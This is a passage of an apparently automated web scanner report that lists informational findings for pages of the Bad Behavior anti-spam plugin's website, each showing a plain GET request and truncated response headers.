Host:   http://bad-behavior.ioerror.us
Path:   /category/lifetype/

Request

GET /category/lifetype/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762040+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 64578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.189. http://bad-behavior.ioerror.us/category/mediawiki/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/mediawiki/

Request

GET /category/mediawiki/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762042+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 79518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.190. http://bad-behavior.ioerror.us/category/open-source/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/open-source/

Request

GET /category/open-source/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762051+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 44374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.191. http://bad-behavior.ioerror.us/category/personal/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/personal/

Request

GET /category/personal/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762051+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 14259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.192. http://bad-behavior.ioerror.us/category/php/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/php/

Request

GET /category/php/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762055+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 22561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.193. http://bad-behavior.ioerror.us/category/project-honey-pot/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/project-honey-pot/

Request

GET /category/project-honey-pot/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762058+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 38693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.194. http://bad-behavior.ioerror.us/category/spam/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/spam/

Request

GET /category/spam/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762062+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 66861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.195. http://bad-behavior.ioerror.us/category/windows/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/windows/

Request

GET /category/windows/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762064+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 19208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.196. http://bad-behavior.ioerror.us/category/wordpress-1-6/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/wordpress-1-6/

Request

GET /category/wordpress-1-6/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762073+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 16671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.197. http://bad-behavior.ioerror.us/category/wordpress-2-0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/wordpress-2-0/

Request

GET /category/wordpress-2-0/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762077+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 49843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.198. http://bad-behavior.ioerror.us/category/wordpress-2-1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/wordpress-2-1/

Request

GET /category/wordpress-2-1/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762086+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 12062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.199. http://bad-behavior.ioerror.us/category/wordpress-com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/wordpress-com/

Request

GET /category/wordpress-com/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762087+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 41366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.200. http://bad-behavior.ioerror.us/category/wordpress/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/wordpress/

Request

GET /category/wordpress/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762068+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 72271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.201. http://bad-behavior.ioerror.us/category/wp-spamfree/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/wp-spamfree/

Request

GET /category/wp-spamfree/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762092+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 15417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.202. http://bad-behavior.ioerror.us/comments/feed/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /comments/feed/

Request

GET /comments/feed/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:15 GMT
Content-Type: text/xml; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761875+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Last-Modified: Tue, 15 Feb 2011 03:40:40 GMT
ETag: "aa1d02af4237370c9b1240a71fc3d83a"
Content-Length: 8288

<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:atom="http://www.w3.org/2005/Atom
...[SNIP]...

7.203. http://bad-behavior.ioerror.us/contact/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /contact/

Request

GET /contact/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761901+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 22826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.204. http://bad-behavior.ioerror.us/documentation/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /documentation/

Request

GET /documentation/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761905+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 23348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.205. http://bad-behavior.ioerror.us/documentation/benefits/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /documentation/benefits/

Request

GET /documentation/benefits/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761915+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 24070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.206. http://bad-behavior.ioerror.us/documentation/connector/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /documentation/connector/

Request

GET /documentation/connector/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761918+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 25167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.207. http://bad-behavior.ioerror.us/documentation/how-it-works/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /documentation/how-it-works/

Request

GET /documentation/how-it-works/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761917+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 24856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.208. http://bad-behavior.ioerror.us/documentation/spam-prevention-strategy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /documentation/spam-prevention-strategy/

Request

GET /documentation/spam-prevention-strategy/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761918+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 24886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.209. http://bad-behavior.ioerror.us/documentation/who-uses-bad-behavior/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /documentation/who-uses-bad-behavior/

Request

GET /documentation/who-uses-bad-behavior/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761915+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 24595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.210. http://bad-behavior.ioerror.us/donate/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /donate/

Request

GET /donate/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761896+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 22304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.211. http://bad-behavior.ioerror.us/download/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /download/

Request

GET /download/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:12:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761919+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 26296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.212. http://bad-behavior.ioerror.us/faq/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /faq/

Request

GET /faq/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:12:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761919+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 27396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.213. http://bad-behavior.ioerror.us/feed/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /feed/

Request

GET /feed/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:12 GMT
Content-Type: text/xml; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761872+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Last-Modified: Tue, 15 Feb 2011 06:24:42 GMT
ETag: "d0aa19c0e184cf0e188a04458920669c"
Content-Length: 41688

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:dc="http://purl.org/dc/elem
...[SNIP]...

7.214. http://bad-behavior.ioerror.us/feed/atom/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /feed/atom/

Request

GET /feed/atom/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:13 GMT
Content-Type: application/atom+xml; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761873+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Last-Modified: Tue, 15 Feb 2011 06:24:42 GMT
ETag: "d0aa19c0e184cf0e188a04458920669c"
Content-Length: 45363

<?xml version="1.0" encoding="UTF-8"?><feed
xmlns="http://www.w3.org/2005/Atom"
xmlns:thr="http://purl.org/syndication/thread/1.0"
xml:lang="en"
xml:base="http://bad-behavior.ioerror.us/wp-ato
...[SNIP]...

7.215. http://bad-behavior.ioerror.us/feed/rss/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /feed/rss/

Request

GET /feed/rss/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
